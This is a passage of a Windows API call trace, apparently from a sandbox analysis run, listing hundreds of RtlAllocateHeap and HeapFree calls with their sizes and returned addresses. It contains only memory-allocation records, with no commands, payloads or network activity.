[0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24193a0 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24191c0 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd930 [0132.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24193b8 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24193d0 [0132.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24193a0 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24193a0 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24193e8 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419768 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd950 [0132.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419400 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419418 [0132.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24193e8 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24193e8 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd960 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419430 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419448 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd970 [0132.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd960 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419460 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419478 [0132.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2419430 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419430 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419490 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24194a8 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24194c0 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24194d8 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24194f0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419790 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd960 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419508 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419520 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24194f0 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x24197b8 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24196e0 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24194f0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419538 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24196e0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd980 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419550 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419568 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2419538 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419538 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd990 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419580 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419598 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd9a0 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd990 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24195b0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24195c8 [0132.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2419580 | out: hHeap=0x25c0000) returned 1 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419580 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24195e0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24195f8 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419610 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419628 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419640 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24198d8 [0132.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd990 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419658 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419670 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2419640 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419640 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419688 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419900 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd9b0 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24196a0 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24196b8 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2419688 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419688 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x241a0d8 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a4d8 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a4f0 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a0e8 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a0d8 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a508 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a520 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a4d8 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a4d8 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a538 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a550 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a568 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a580 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a598 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419928 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a0d8 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a5b0 [0132.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a5c8 [0132.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a598 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a598 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a5e0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419950 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a0f8 [0132.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a5f8 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a610 [0132.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a5e0 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a5e0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x241a108 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a628 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a640 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a118 [0132.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a108 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a658 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a670 [0132.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a628 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a628 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a688 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a6a0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a6b8 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a6d0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a6e8 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419978 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a108 [0132.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a700 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a718 [0132.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a6e8 | out: hHeap=0x25c0000) returned 1 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a6e8 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a730 [0132.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24199a0 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a128 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a748 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a760 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a730 | out: hHeap=0x25c0000) returned 1 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x200) returned 0x241a8c0 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24197b8 | out: hHeap=0x25c0000) returned 1 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a730 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x241a138 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a778 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a790 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x241a148 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a138 | out: hHeap=0x25c0000) returned 1 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a7a8 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x241a7c0 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a778 | out: hHeap=0x25c0000) returned 1 [0132.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x241a778 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a838 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a880 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a168 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241aaf8 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241abb8 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ac00 | out: hHeap=0x25c0000) returned 1 [0132.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a198 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ac48 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ad08 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ad50 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a1c8 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ad98 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ae58 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241aea0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a1f8 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241af10 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241afd0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b018 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a228 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b060 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b120 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b168 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a258 | out: hHeap=0x25c0000) returned 1 [0132.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b1b0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a8c0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b270 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b6e8 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a288 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b730 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b7f0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b838 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a2b8 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b880 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b940 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b988 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a2e8 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b9d0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ba90 | out: hHeap=0x25c0000) returned 1 [0132.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bb00 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a318 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bb48 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bc08 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bc50 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a348 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bc98 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bd58 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bda0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a378 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bde8 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bea8 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bf18 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a3a8 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241bf60 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c020 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c068 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a3d8 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c0b0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c170 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c1b8 | out: 